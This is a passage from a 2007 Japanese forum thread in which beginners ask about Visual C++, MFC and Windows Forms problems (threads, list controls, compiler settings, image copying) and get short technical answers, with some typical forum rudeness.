mci関数で曲を止める時は親ウィンドウでやっていますが、エラーメッセージが表示されるのが、ちょうどここのmciSendCommandの所なので
それ以前に親ウィンドウでmci関数の命令を呼び出していないという意味です

おそらくコールバックのハンドルはスレッドのハンドル?を渡せば良い気がしないでも無いですが
スレッド内でのメッセージ処理をCWinThread(もしくはAfxBeginThreadで呼び出したスレッド関数)で受け取る方法が分かれば解決といった感じになりそうです
以前に何か違う方法でスレッドを作っていた気がしないでもないですが、やり方を完全に喪失しておりますし
何よりもMFCを使って初プログラムしているので、なるべくどちらかで処理したいと思っております

これはMFC相談室の方に移動ですか?

121 :デフォルトの名無しさん:2007/01/13(土) 17:30:56
非同期

122 :デフォルトの名無しさん:2007/01/14(日) 13:06:01
全角文字を文字化けせずに、tcpで相手に送信する方法がわかりません・・・。


123 :デフォルトの名無しさん:2007/01/14(日) 14:56:59
送る側と受ける側で文字コードが揃っていればとりあえずできるはず。

124 :デフォルトの名無しさん:2007/01/15(月) 10:36:09
MFCでアプリケーション名を変更する方法を教えてください

125 :デフォルトの名無しさん:2007/01/15(月) 11:12:56
どこで使われる名前のこと言ってるの?

126 :デフォルトの名無しさん:2007/01/15(月) 11:15:49
起動したときに一番左上に表示されるところです

127 :デフォルトの名無しさん:2007/01/15(月) 12:16:28
>>124
ttp://msdn2.microsoft.com/en-us/library/00ak0bwd(vs.80).aspx

128 :デフォルトの名無しさん:2007/01/15(月) 14:58:29
>>127

free((void*)m_pszAppName);
m_pszAppName=_tcsdup(_T("test"));

m_pszAppNameの中身は変わりましたが起動しても反映されてませんでした

129 :デフォルトの名無しさん:2007/01/15(月) 15:26:19
それ見て表示する人がいるから
その人が表示する前に変えないとだめだな

見た目の問題ならウィンドウへ直接書いちゃった方が楽かもしれんな

130 :デフォルトの名無しさん:2007/01/15(月) 15:40:31
Doc/Viewなら文字列リソースのIDR_MAINFRAMEだっけか

131 :124:2007/01/15(月) 15:47:01
できました ありがとうございます

132 :デフォルトの名無しさん:2007/01/15(月) 15:47:54
ちょっと興味持ったんで見てみたけど、m_pszAppNameはAfxMessageBox()のタイトルには影響するね。
IDR_MAINFRAMEはDoc/View外しても有効だね。

結局、動的に替えるなら自分でSetWindowText()したほうがいいのか

133 :デフォルトの名無しさん:2007/01/16(火) 14:24:45
すいません、先月はじめたばかりなのですが、デバッガの使い方がさっぱり判りません。
適当に買った本で勉強して、言葉は理解できるのですが内容までは判らないのが現状です。
よろしければ実際にサンプルコードを用いながら解説しているサイト等教えていただけないでしょうか?
特に、スッテプイン、ステップオーバー、スッテプアウトが鬼門です。

134 :デフォルトの名無しさん:2007/01/16(火) 14:27:14
連続で失礼します。特にforの繰り返し構文を用いたときのデバッガの使い方が知りたいです。
よろしくお願いします。

135 :デフォルトの名無しさん:2007/01/16(火) 14:31:23
>>133
その、「スッテプイン、スッテプアウト」とやらは何物だ?

それはさておき、これくらい知っておけばなんとかなるだろ。
StepIn:関数に踏み込む
StepOver:関数に踏み込まずに次(の行)を踏む。
StepOut:関数から抜け出す
BreakPoint:停止する行を指定

136 :デフォルトの名無しさん:2007/01/16(火) 15:12:27
最初は適当な変数に目を付けてウォッチしながらステップ実行してるだけで
いろいろわかるとい思う

137 :デフォルトの名無しさん:2007/01/16(火) 18:40:28
>135
はい、日本語としては判るのですが、なんというかこう感覚として身についていないというか
どうも雲をつかむような感じがして会得できていないのです。

>136
ありがとうございます。自分で適当にコードを書いていろいろと試してみます。

138 :sage:2007/01/17(水) 00:15:37
こんばんは。
↓のファイルをC++としてコンパイルしたいのですが、クラス宣言のところでエラーになってしまいます。
/TPオプションは付けています。
こういう場合、他に設定するところがあるんでしょうか?
以上よろしくお願いします。


//ファイル名:main.c
#include <stdio.h>

class test{
public:
void func1(){
printf("func1\n");
}
};

void main(){
test obj1;

obj1.func1();
}


139 :デフォルトの名無しさん:2007/01/17(水) 00:31:52
VC8なら通ったよ

140 :138:2007/01/17(水) 00:40:25
>>139
私はMicrosoft Visual C++ 2005を使って、空のプロジェクトに
>>138のmain.cを追加して作りましたが通りませんでした。
変えたオプションとかありますか?

141 :デフォルトの名無しさん:2007/01/17(水) 00:47:57
/TPだけです。

たぶんプロジェクトのプロパティでは/TPになってて
ソースのプロパティでは/TCになってるんじゃないかな。

142 :デフォルトの名無しさん:2007/01/17(水) 00:49:54
ところで、それなんて嫌がらせ?

143 :138:2007/01/17(水) 00:52:07
>>141
できました!
プロパティってソースごとに設定できるんですね...
ありがとうございます。

144 :デフォルトの名無しさん:2007/01/17(水) 08:08:53
>>138
C++のコードを書くなら拡張子をcにするなよ。

145 :デフォルトの名無しさん:2007/01/17(水) 10:19:01
リストコントロールを一番下までスクロールさせたくて、
↓こんな処理をやっているのですが、もっとスマートな方法はないでしょうか?

CListCtrl m_lstInfo;
CSize size;

size.cx = 0;
size.cy = 100000; //100000以上の高さだったらどうする?
BOOL bRet = m_lstInfo.Scroll(size);


開発環境:WinXp、VC++6.0
です。

146 :デフォルトの名無しさん:2007/01/17(水) 10:58:02
>>145
EnsureVisible使ったら?

147 :145:2007/01/17(水) 11:22:13
>>146
できました!
ありがとうございます。

148 :デフォルトの名無しさん:2007/01/17(水) 14:20:32
仮想リストビューにチェックボックスつけたいのですが
表示されるところまではなんとか行ったのですが
SetCheckまでも自分で実装しなければなりません。
初心者である自分には異常に難しいのですが
他にいい方法は無いでしょうか?

149 :デフォルトの名無しさん:2007/01/17(水) 16:36:20
仮想モードで表示まで完成してるならSetCheckは不要。
もしユーザーのマウス/キーボード入力に反応しないってこと言ってるなら
それはSetCheckとは無関係。両イベントから内部状態変更&アイテム再描画
をかけるだけ。

150 :質問1:2007/01/17(水) 19:26:42
↓のようなエラーが出ます。
d:\abstract2bad\abstract2bad\abstract2bad.cpp(40) : error C2248: 'basepair::getkey' : protected メンバ (クラス 'basepair' で宣言されている) にアクセスできません。
d:\abstract2bad\abstract2bad\abstract2bad.cpp(20) : 'basepair::getkey' の宣言を確認してください。
d:\abstract2bad\abstract2bad\abstract2bad.cpp(7) : 'basepair' の宣言を確認してください。
d:\abstract2bad\abstract2bad\abstract2bad.cpp(45) : error C2248: 'basepair::getvalue' : protected メンバ (クラス 'basepair' で宣言されている) にアクセスできません。
d:\abstract2bad\abstract2bad\abstract2bad.cpp(18) : 'basepair::getvalue' の宣言を確認してください。
d:\abstract2bad\abstract2bad\abstract2bad.cpp(7) : 'basepair' の宣言を確認してください。




151 :デフォルトの名無しさん:2007/01/17(水) 19:27:42
自己解決しました

152 :デフォルトの名無しさん:2007/01/17(水) 19:28:22
そのまんまの意味じゃん

153 :質問1(続き):2007/01/17(水) 19:29:04
ソースを次に書きます。

/* 派生クラスで純粋仮想関数をオーバーライドするプログラム */
#include <iostream>
#include <string>
using namespace std;

// basepair抽象クラスの定義
class basepair {
// デフォルトコンストラクタの使用を禁止する
basepair() {}
protected://@ A
//public://@ B
// データメンバ
string key, value;
// 引数をとるコンストラクタ
basepair(const char *pstrkey, const char *pstrval)
: key(pstrkey), value(pstrval) {}
// getvalue()メンバ関数を定義する
const char *getvalue() { return value.c_str(); }
// getkey()メンバ関数を定義する
const char *getkey() { return key.c_str(); }
// keycomp()純粋仮想関数を宣言する
virtual int keycomp(basepair &rp) = 0;
// valcomp()純粋仮想関数を宣言する
virtual int valcomp(basepair &rp) = 0;
// getpairvalue()純粋仮想関数を宣言する
virtual const char *getpairvalue(const char *pstrkey) const = 0;
// getpairkey()純粋仮想関数を宣言する
virtual const char *getpairkey(const char *pstrval) const = 0;
};
//(以下に続く)

154 :質問1(続き):2007/01/17(水) 19:29:40
// mypair派生クラスの定義
class mypair : public basepair {
public:
// 引数をとるコンストラクタ
mypair(const char *pstrkey, const char *pstrval)
: basepair(pstrkey, pstrval) {}

// keycomp()純粋仮想関数に独自の実装を行う
virtual int keycomp(basepair &rp) {
return strcmp(key.c_str(), (rp).getkey());// A A エラー箇所40行目
// return strcmp(key.c_str(), static_cast<mypair &>(rp).getkey());// A B
}
// valcomp()純粋仮想関数に独自の実装を行う
virtual int valcomp(basepair &rp) {
return strcmp(value.c_str(), (rp).getvalue());// B A エラー箇所45行目
// return strcmp(value.c_str(), static_cast<mypair &>(rp).getvalue());// B B
}
// getpairvalue()純粋仮想関数に独自の実装を行う
virtual const char *getpairvalue(const char *pstrkey) const {
if (key == pstrkey) return value.c_str();
else return NULL;
}
// getpairkey()純粋仮想関数に独自の実装を行う
virtual const char *getpairkey(const char *pstrval) const {
if (value == pstrval) return key.c_str();
else return NULL;
}
};
//(以下に続く)

155 :質問1(続き):2007/01/17(水) 19:30:31
int main() {
// mypairクラス型の配列を作成する
mypair mp[] = { mypair("358-0015", "さいたまけんいるましにほんぎ"),
mypair("500-8165", "ぎふけんぎふしおいまつちょう"),
mypair("272-0034", "ちばけんいちかわしいちかわ"),
mypair("060-0000", "ほっかいどうさっぽろしちゅうおうく"),
mypair("670-0974", "ひょうごけんひめじしいいだ"),
mypair("770-0874", "とくしまけんとくしましみなみおきのす")
};

if ( mp[5].keycomp(mp[1]) )
{
cout << "mp[5]とmp[1]のKeyは異なる\n";
}
else
{
cout << "mp[5]とmp[1]のKeyは同じ\n";
}

if ( mp[5].keycomp(mp[5]) )
{
cout << "mp[5]とmp[5]のKeyは異なる\n";
}
else
{
cout << "mp[5]とmp[5]のKeyは同じ\n";
}

getchar();

return 0;
}

156 :質問1(続き):2007/01/17(水) 19:35:54
コンパイルを通すにはA、Bで、rpはキャストすればいい(それぞれ、A→B)ようですが、
これって、static_castがベストでしょうか?




157 :質問1(続き):2007/01/17(水) 19:38:46
dynamicだと問題があるでしょうか?

以上です。

158 :デフォルトの名無しさん:2007/01/17(水) 20:33:15
basepair の、公開メンバっぽいものを全て protected にしてる所に問題があると思うよ。

あと、スレ違い臭

159 :デフォルトの名無しさん:2007/01/17(水) 21:16:54
>>158
>basepair の、公開メンバっぽいものを全て protected にしてる所に問題があると思うよ。
ご回答ありがとうございます。

>あと、スレ違い臭
今まで気づきませんでした。すみません。

これにて私の質問は終えたいと思います。

160 :デフォルトの名無しさん:2007/01/18(木) 16:01:37
垂直スクロールバーを矢印キーで動かして値を変化させることはできますか?
たとえばバーが2つあって「↑↓」で1つ目を増減させ、「←→」で2つ目を増減させるとか。
今はSB_LINELEFT等を使ってマウスで動かしてます。

161 :デフォルトの名無しさん:2007/01/18(木) 16:16:03
楽勝できる

162 :デフォルトの名無しさん:2007/01/18(木) 16:54:01
>>161
片方しか動かせないんですよ。お兄ちゃんおせーてください。

163 :デフォルトの名無しさん:2007/01/18(木) 21:28:45
ヘッダファイルってどこに保存すればいいのですか?

164 :デフォルトの名無しさん:2007/01/18(木) 22:28:07
どこでも好きなところにどうぞ

165 :デフォルトの名無しさん:2007/01/18(木) 23:00:27
>>164
学校の宿題で、ヘッダファイルをDLして、プログラムを書くらしいのですが、
どのフォルダに追加していいのか分かりません。

左のヘッダーファイルのフォルダに追加したのですが、
「include ファイルを開けません」
「'gucc.h': No such file or directory」と出てしまいます。
gucc.hはヘッダーファイルの名前です。

visual C++ 2005を使っています。

166 :デフォルトの名無しさん:2007/01/18(木) 23:10:43
ではもう一度

どこでも好きなところにどうぞ


その代わり、インクルードパスの指定はしっかりしてください


それすらわからんなら全部まとめて同じ場所に保存しとけ


それでもダメなら先生に教わっておいで

167 :デフォルトの名無しさん :2007/01/19(金) 00:27:32
それでもダメなら俺とディープキスしろ

168 :デフォルトの名無しさん:2007/01/19(金) 00:38:58

         _,,..,,,,_   _,,..,,,,_
        ./     ヽ /   ヽ
       l   ・ωl lω・   l
       `'ー--┳━┳---‐´


         _,,..,,,,_   _,,..,,,,_
        ./     ヽ /   ヽ
       l    ,,・3,,-ω-,, l  〜♪
       `'ー--┳━┳---‐´

169 :デフォルトの名無しさん:2007/01/19(金) 16:52:13
開発環境:WinXp、VC++6.0

リストコントロールの水平スクロールバーが表示されているかどうか判定する方法ってありますか?

170 :169:2007/01/19(金) 17:43:34
自己解決しました。

if(GetScrollLimit(SB_HORZ) > 0)

171 :169:2007/01/19(金) 17:53:34
開発環境:WinXp、VC++6.0

また行き詰ってしまったので、再度質問です。

リストコントロールの選択アイテムが、可視部の何番目が選択されているかというのは分かりますでしょうか?


下図の例で言うと、垂直スクロールバーが表示されているリストコントロールで、
矢印の行が選択されていた場合、インデックス値は2ですが可視部だけなら1ということで、
その1という値を求めたいということです。


<例図>(『あ』はインデックス0番目のアイテムだが、スクロールによって見えてない。)

 (あ)
   ―――――
  |い      ‖
→|う■■■■‖
  |え      ‖
  |お      ‖
  |――――― 

172 :デフォルトの名無しさん:2007/01/19(金) 18:04:05
リストコントロールはそんな使い方を想定してはいない。

173 :デフォルトの名無しさん:2007/01/19(金) 18:08:50
>>171
m_list.GetCurSel() - m_list.GetTopIndex()

174 :デフォルトの名無しさん:2007/01/19(金) 18:29:01
>>173
GetCurSelはリストコントロールにはなかったですけど、出来ました!
ありがとうございます。

m_list.GetSelectionMark() - m_list.GetTopIndex()


175 :デフォルトの名無しさん:2007/01/19(金) 21:05:11
VC++.net「Windowsフォームアプリケーション」において、MFCにおけるBitBlt関数のように
画像をpictureboxから別のpictureboxに部分コピーする方法がわからないのですが
何か良い方法はないでしょうか。

176 :デフォルトの名無しさん:2007/01/19(金) 21:16:24
DrawImageじゃだめかな

177 :デフォルトの名無しさん:2007/01/19(金) 21:22:28
System.Drawing.Graphics.DrawImageで頑張ってください
BitBlt使う方法もあるけどな

178 :デフォルトの名無しさん:2007/01/19(金) 21:24:32
>>176
レスありがとうございました。どうもそれでできそうです。
VC++はMFCとかWINDOWSフォームとか、それぞれ勝手が違うのでちょっと困ってました。
もうちょっと参考書買い足してみることにします。

179 :デフォルトの名無しさん:2007/01/19(金) 21:25:15
>>177
ありがとうございます。
あとsage忘れました。ごめんなさい。

180 :デフォルトの名無しさん:2007/01/19(金) 21:40:41
すみません、プログラムの実行時(=作成するプログラム)に
外部実行ファイル(=既存のプログラム)を起動するにはどうしたらよろしいでしょうか?

181 :デフォルトの名無しさん:2007/01/19(金) 21:51:50
猫でもわかるプログラムを見たんですが
わからない俺は猫以下なんでしょうか…

182 :デフォルトの名無しさん:2007/01/19(金) 21:56:34
>>180
ShellExecute
>>181
あそこの猫は特別優秀らしい

183 :デフォルトの名無しさん:2007/01/19(金) 21:59:58
>>182 なるほど
とりあえず何を勉強したらいいんですかね?
目標はゲームを作ることなんですが


184 :180:2007/01/19(金) 22:13:36
>>182
できました〜
調べ物が多くて参ってたので助かりました
ありがとうございました。

185 :175:2007/01/19(金) 23:40:14
>>177
すいません。windowsフォームでBitBltを使う方法ってどんなのでしょうか。
Drawimageだと画像の「部分」を取り出すことができませんでした。
(画像全体が、取り出したい部分サイズに縮小されてしまいました。
DrawImageUnscaledAndClippedメソッドというのもあるようですが、自分のバージョンは古いらしく対応していないようでした。)
度々すいません。

186 :デフォルトの名無しさん:2007/01/20(土) 00:22:48
あなたには功夫、じゃなくて努力が足りないわ
DrawImageメソッドには描画元の領域指定できるのも用意されている。よく探せ。

187 :175:2007/01/20(土) 00:42:09
>>186
ありがとうございます。
もっと粘ってみますね。

188 :デフォルトの名無しさん:2007/01/20(土) 00:44:34
オーバーロードが30個もあると気が滅入る。

189 :デフォルトの名無しさん:2007/01/20(土) 08:54:49
MSDNくらい見れんのかと

190 :デフォルトの名無しさん:2007/01/20(土) 12:22:27
パイだっけ

191 :デフォルトの名無しさん:2007/01/20(土) 13:17:20
ピクチャボックスに縮小された線の色をピクセル単位ではなく、ドット単位で検出するAPIってありますか?


192 :デフォルトの名無しさん:2007/01/20(土) 13:21:27
ピクセル単位とドット単位の違いは何?

193 :デフォルトの名無しさん:2007/01/20(土) 13:50:30
志村〜

194 :デフォルトの名無しさん:2007/01/20(土) 22:07:35
C1010: プリコンパイル済みヘッダーの検索中に予期しない EOF を検出しました。

MSDN見てヘッダ関係かと思ったんですが#includeはきっちりしてあるのにエラーが・・・
#include <stdlib.h>
#include <stdio.h>

int Main(int argc, _TCHAR* argv[])
{
printf("test\n");
return 0;
}

なんかしょうもないボカやってる悪寒が

195 :デフォルトの名無しさん:2007/01/20(土) 22:08:49
フォルダの中にあるファイルを指定して、そのファイルをifstreamで開く、という風にしたのですが、どうしたらいいのでしょうか?

196 :デフォルトの名無しさん:2007/01/20(土) 22:19:11
プリコンパイル済みヘッダーがないじゃん

197 :デフォルトの名無しさん:2007/01/20(土) 22:30:35
>>196すみません
stdafx書き込むの忘れてました

弟がstdafx.hを弟がソリューションから消したのが正解でした・・・・
返してくれ俺の3時間orz

198 :デフォルトの名無しさん:2007/01/20(土) 23:02:12
>>195
プログラムの利用者はどうやってフォルダの中にあるファイルを指定するのか。

199 :デフォルトの名無しさん:2007/01/21(日) 16:01:47
論理ペンの作成がうまくいかないので、どなたか指南していただけますでしょうか。
SelectObject(hdc,CreateFont(20,0,0,0,
FW_DONTCARE,
FALSE,FALSE,FALSE,
SHIFTJIS_CHARSET,
OUT_DEFAULT_PRECIS,
CLIP_DEFAULT_PRECIS,
DEFAULT_QUALITY,
DEFAULT_PITCH | FF_DONTCARE,
"Arial Black")
);
こんな感じで論理ペンを作成したのですが、
どうあがいてもArial Blackではないフォントで描画されてしまいます。
どうしてArial Blackで描画させたいのですがどうすればよいでしょうか・・・

200 :デフォルトの名無しさん:2007/01/21(日) 16:16:16
ソレはペンではないし、オブジェクトは漏れてるし、

201 :デフォルトの名無しさん:2007/01/21(日) 16:41:15
思い通りにならないならGetLastError&FormatMessageなりで何か起こってないかなど調べるくらいしなさい
後別にVCの使い方関係ないし、Win32APIスレで聞いた方が良い

202 :デフォルトの名無しさん:2007/01/21(日) 17:19:53
今度会社でVC6で開発をしなくてはならなくなりました、社内ではVC6が現役でガンガッテいます
漏れ的には無料のVC8の方が格別に使いやすいのですが、ライセンスの関係でVS2005の
無聊版は使えないらしいのです、仕方なく会社のVC6をコッソリ家に持って帰り
インスコしてSP6を当てマスタそして
VC6で開発する時の注意事項などあれば教えてホスイ

203 :デフォルトの名無しさん:2007/01/21(日) 17:28:04
特にない

204 :デフォルトの名無しさん:2007/01/21(日) 17:32:33
質問です。
Windowsフォームアプリケーションで、

String *data=S"aaaaa";
if(data->Substring(1,1)==S"a"){text1->Text=S"ok";}
if(data->Substring(1,1)!=S"a"){text1->Text=data->Substring(1,1);}
このような構文を走らせたところ、text1には変化なし、
しかしtext2には"a"と表示されてしまいました。

一体なにがいけないのでしょうか?

205 :デフォルトの名無しさん:2007/01/21(日) 17:48:42
>>202
注意事項:コッソリ持って帰らない

206 :デフォルトの名無しさん:2007/01/21(日) 17:49:45
>>202
テンプレート使いまくりの変態プログラミングは諦めろ。
付属のSTLもかなり怪しいし、boostは駄目かもしれん。

207 :デフォルトの名無しさん:2007/01/21(日) 17:52:39
>>204
Substringということは.NETか
C++で.NET使ったこと無いんだが、なんだその「S」は?
まぁそのSが何のつもりか知らんが、その比較演算はC++としてありえない

208 :デフォルトの名無しさん:2007/01/21(日) 17:55:55
text2はどこから沸いてきたのか

209 :デフォルトの名無しさん:2007/01/21(日) 18:08:30
>>202
御社名を教えていただければ、開発に当たっての様様なノウハウをお教えするに吝かではありません。
#尤も、MSに密告しない保証は致しかねますが。

210 :デフォルトの名無しさん:2007/01/21(日) 18:27:35
>>202です
そうですねこっそり持って帰るのはイクナイノデアンインストールして明日会社に返します。
本棚の隅に1999年に買って一度も目を通したことの無かった
SHOEISHAの「プログラミング学習シリーズ山本信雄 著 VisualStuidio C++」
を開いてみたら
char s(80);
lstrcpy(s, "おはようございます。");
ってなってマスタ、
char s(80);は今日日ねーべなと思い
char s[80];
で動きマスタ
昔のVS6はchar s(80);でもコンパイルエラーでなかったのかな??
因みに漏れはSP6を家で堂々と当てたのでエラーになったのだと思う
C99はchar s(80);これでもOKだったのかい??


211 :204:2007/01/21(日) 19:05:40
String::Equals(s1->Substring(1,1),"a")でできました。
ありがとうございました。

212 :デフォルトの名無しさん:2007/01/21(日) 19:45:44
>>210
おそらく本の誤植。
ちなみにC++でchar s(80);はコンストラクタ引数を与える構文になるが、charは組込型なのでchar s = 80;と同じ意味になる。

213 :デフォルトの名無しさん:2007/01/21(日) 21:01:52
プログラムを作れという課題を出されたのですが、どのようなプログラムを作ればいいか全く検討もつきません。

一応、課題の例は出されたのですが、ちょっと無理かなと思いまして・・・

例は、
・駐車場のパーキングシステム
・飛行機の搭乗席を予約するシステム
・マトリックスを計算する電卓
・ブラックジャック
・ポケットゲーム
などです。

この他になにかアイディアはありませんでしょうか。
宜しくお願いします。

214 :デフォルトの名無しさん:2007/01/21(日) 21:19:34
>>213
お前死ね
お前が無理ではないと思うプログラム作ったらイイジャマイカ
答え
お前死ね

215 :デフォルトの名無しさん:2007/01/22(月) 11:21:38
どのスレで質問していいのかわからないのですが、このスレで失礼します。
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define N 7
main ()
{
int a[100]={0,5,2,4,6,1,3,7};
int i,x,j;
clock_t ts,te;
double p;
for(i=1; i<=N; i++) a[i]=rand();
ts=clock();
for(i=2; i<=N; i++){
x=a[i]; a[0]=x;
j=i-1;
while(a[j] > x){
a[j+1]=a[j];
j=j-1;
}
a[j+1]=x;
}
te=clock();
p=(double)(te-ts)/CLOCKS_PER_SEC;
for(i=1; i<=N; i++) printf("%d ",a[i]);
printf("\n");
}
という挿入法のプログラムを作り、整列アルゴリズムのデータ個数と処理時間の平均値を用いたのですが、整列手前等で、ある条件下では処理時間が入れ替わることがあるんです。
その理由をお教えください。よろしくお願いします。


216 :デフォルトの名無しさん:2007/01/22(月) 11:43:04
どの位変わるのか判らんが、現在のPCとOSで必ず同じ時間になる保証はどこにもないよ。
ましてその程度のコードだと、初回とそれ以降ではキャッシュの乗りが確実に違うだろうし。

217 :デフォルトの名無しさん:2007/01/22(月) 18:19:47
レスどうもです。
説明不足でした。すみません。
PCとOSで必ず同じ時間になる保証はどこにもないのは知ってます。
上記のプログラムで、ある条件下では処理時間が入れ替わることがあるという部分(理由)はあるでしょうか?
お教えください。

218 :デフォルトの名無しさん:2007/01/22(月) 18:23:30
「入れ替わる」ってどういう意味だ?

まさかとは思うが、CLOCKS_PER_SECの関係でばらつきがでることを問題視したいのだろうか。
例えばCLOCKS_PER_SECが100msなら、110msの処理時間は100msと表示されることも200msと表示されることもあるわけだが。

219 :デフォルトの名無しさん:2007/01/22(月) 18:33:56
具体的に書いてくれないとわからんな

220 :デフォルトの名無しさん:2007/01/23(火) 04:40:35
若いの オラが村では派遣労働の問題を口にしちゃなんねーだ
お前さんはまだわけぇから言いたいこともあるべぇ
だべな、派遣問題を口にするとムキになって怒る者がおるでよぉ
問題の指摘は駄目だっぺぇ
派遣のことは口にしちゃなんねぇ
この村みたいな民度ゼロの会社で現実忘れるためはよ
北朝鮮と一緒でよ、駄目のものを駄目と言ってはなんねえだべさ
タブーを口にしちゃいけねぇだ


221 :お願いします:2007/01/23(火) 23:25:07
プログラムを実行したところ、

LINK : fatal error LNK1249: イメージのベース アドレスが 400000、
サイズが 0x7FFEF000 で、最大範囲を超えています。

というエラーが出るのですが、この最大範囲を大きく変更するには
どうすればいいのですか。

よろしくお願いします。

222 :デフォルトの名無しさん:2007/01/23(火) 23:54:14
リンカオプションの/LARGEADDRESSAWAREを試せ。
だめだったら64bit化しろ。

223 :デフォルトの名無しさん:2007/01/24(水) 08:05:37
Kitty on your lap
という言葉をよく見かけるのですが、これはUNIX系でいうhoge foo varと
同じような意味なんでしょうか?

224 :デフォルトの名無しさん:2007/01/24(水) 08:57:19
同じ質問をどこかで見たな…
とりあえずその文でぐぐってみれ。

225 :デフォルトの名無しさん:2007/01/24(水) 12:17:04
なんかのゲームなのでしょうか。
ホームページ作者の趣味なんですね。

226 :デフォルトの名無しさん:2007/01/24(水) 16:14:01
よく見かけませんよ

227 :デフォルトの名無しさん:2007/01/24(水) 18:27:38
キティちゃんをあなたのサランラップで包んでください

228 :デフォルトの名無しさん:2007/01/24(水) 19:32:57
すいません、教えてください。
VC6.0で作ったプロジェクトを2005に移行することになりました。
型変換や標準関数の変更でガンガンエラーはでるものの、なんとか修正してきましたが、
COMのインターフェースの定義で、oledb.hに書かれているものと同じ名前の
インターフェースを使用していたのですが、2005に移行したらインターフェース名を
変更しないと使用できなくなりました。
名前を変更すればビルドはできるものの、今まで使えていただけに2005でも
何かすれば使えるのではないかと思っています。
どうにかヒントでも頂ければ幸いです。

229 :デフォルトの名無しさん:2007/01/26(金) 02:04:48
WindowsXP,VC2005です。
ユーザーにコマンドライン引数を決めさせたいとき
どのようにすればいいでしょうか?
下のようにするとハングしてしまいます。

#include <iostream>
 using namespace std;

int main(void)
{
char str[100];
char str2;

cout << "引数を入力してください"<<endl;
cin >> str2;
sprintf(str,"test.exe %s",str2);
system(str);
return 0;
}

230 :デフォルトの名無しさん:2007/01/26(金) 02:26:42
>>229
>下のようにするとハングしてしまいます。
str2はcharなのに書式指定子に%sを使っているから。

231 :229:2007/01/26(金) 02:39:56
ありがとうございます。
とりあえず
char str2[64];
としたところ正常に動きました。

232 :デフォルトの名無しさん:2007/01/26(金) 08:36:19
ラジオボタンを2つ用意して、片方をチェックしたらもう片方の
チェックするようにするには、GroupBoxを使うと教えられました。
radioButtonMen,radioButtonWomenの2つのラジオボタンをグループボックスの
上に配置した時に生成されたコードの一部分が↓です。

どのメンバ変数を見れば、どちらをチェックしたかというのがわかるの
でしょうか?


//
// groupBox1
//
this->groupBox1->Controls->Add(this->radioButtonMen);
this->groupBox1->Controls->Add(this->radioButtonWomen);
this->groupBox1->Location = System::Drawing::Point(197, 194);
this->groupBox1->Name = L"groupBox1";
this->groupBox1->Size = System::Drawing::Size(200, 45);
this->groupBox1->TabIndex = 24;
this->groupBox1->TabStop = false;
this->groupBox1->Text = L"groupBox1";

this->groupBox1->ResumeLayout(false);
this->groupBox1->PerformLayout();


233 :デフォルトの名無しさん:2007/01/26(金) 18:22:23
C++/CLIで、プログラミングを始めたばかりです。
(VS C++2005の環境)
フォームにボタンやテキストボックスを配置してビルドすると、
ソースが勝手に追加/削除されたり編集されたりします。
その更新されていくソース・プログラムを見ていて思ったんですけど、
Visual C++でWindowsプログラミングをする場合、
通常プログラマは、
クラスの関連(継承とか)をあまり意識しないんでしょうか?

メンバ変数を用意することってあまりないでしょうか?

あと、普通のC++のコンテナ(vectorやlist)は使用されませんか?

234 :デフォルトの名無しさん:2007/01/26(金) 18:27:34
別に普通に使ってるだろ。
VC++の操作がわかんなかったら手書きでもいいし

235 :デフォルトの名無しさん:2007/01/26(金) 19:14:23
VC8ではコンパイルする時にDebugモードとReleaseモードの選択が出来たのですが
VC6では出来ないのでしょうか?
Debugモードしか見当たりません・・・・・


236 :デフォルトの名無しさん:2007/01/26(金) 19:24:43
少しは調べてから質問しよう

237 :デフォルトの名無しさん:2007/01/26(金) 21:12:11
>>236
>>235ですが
「Vc6 Release」で検索しても分からなかったんですが


238 :デフォルトの名無しさん:2007/01/26(金) 21:16:12
ツールバーのあたりで右クリックして「ビルド」をチェックで出るよ

239 :デフォルトの名無しさん:2007/01/26(金) 21:19:25
MSDNに書いてないわけがない

240 :デフォルトの名無しさん:2007/01/27(土) 00:35:43
Inside Windows買っとけ

241 :デフォルトの名無しさん:2007/01/27(土) 02:41:48
将棋プログラムを作っています。
すべての種類の駒が描かれている1枚のビットマップから
一部を切り出して(読み込んで)オブジェクトにするには
どうしたらいいでしょうか?
一つずつ別ファイルを用意しないとだめ?

242 :デフォルトの名無しさん:2007/01/27(土) 07:26:34
>>238
ありがとう


243 :デフォルトの名無しさん:2007/01/27(土) 13:30:33
VS2005 MFCシングルベースで、

CDC *pDC = GetDC();
AfxBeginThread(ここがわからない);

とメインの中に記述して、マルチスレッドでfunを使って、
funの中でpDCを↓のように使いたいのですが、どうすればいいでしょうか。

void fun(){
  pDC->TextOutW(10,10,_T("aaa"));
}

244 :デフォルトの名無しさん:2007/01/27(土) 13:33:03
MFCオブジェクトをスレッド間で受け渡してはいけない

245 :デフォルトの名無しさん:2007/01/27(土) 13:44:20
>>244
そうなんですか・・・。
では、マルチスレッドのfunの中でpDCを使いたい場合はどうすればよろいのでしょうか。

246 :デフォルトの名無しさん:2007/01/27(土) 13:49:29
馬鹿登場

247 :デフォルトの名無しさん:2007/01/27(土) 13:58:14
>>245
ハンドル渡せば。
でもいろいろ面倒だから、描画関係はそのウィンドウが属するスレッドでやって
描画に関係ない処理を別スレッドでやる方がいいと思うけど。

248 :デフォルトの名無しさん:2007/01/27(土) 14:16:57
キチガイにスレッド

249 :デフォルトの名無しさん:2007/01/27(土) 14:50:03
>>244

なんで?
MSDNのサンプルでもMFCオブジェクトのポインタ渡してるよ。
まーpDCを渡すのはやばいけどね。

250 :デフォルトの名無しさん:2007/01/27(土) 16:36:24
>>249
ハンドル-オブジェクトのテーブルがスレッド固有とかいろいろ。
詳しくはこの辺
ttps://msdn.microsoft.com/library/default.asp?url=/library/en-us/vccore/html/_core_multithreading.3a_.programming_tips.asp

251 :デフォルトの名無しさん:2007/01/27(土) 17:37:52
>>250
注意点や、危険性とその回避方は書いてあるが >>244 のようなことは書いてないぞ。
非MFCスレッドでは出来ないと書いてあるけど。

252 :デフォルトの名無しさん:2007/01/27(土) 17:45:10
>>251
>As a general rule, a thread can access only MFC objects that it created.

253 :デフォルトの名無しさん:2007/01/27(土) 17:50:29
それは明らかにWindows Handle Mapsの説明でしょ。

254 :デフォルトの名無しさん:2007/01/27(土) 17:54:52
>>253
>This is because temporary and permanent Windows handle maps are kept in thread local storage to ensure protection from simultaneous access from multiple threads.
HDC等もハンドルマップを持ってるから、同様な問題があるよ。

255 :デフォルトの名無しさん:2007/01/27(土) 18:05:32
>>253
Windows Handle -> HANDLE, HWND, HDC, SOCKET…
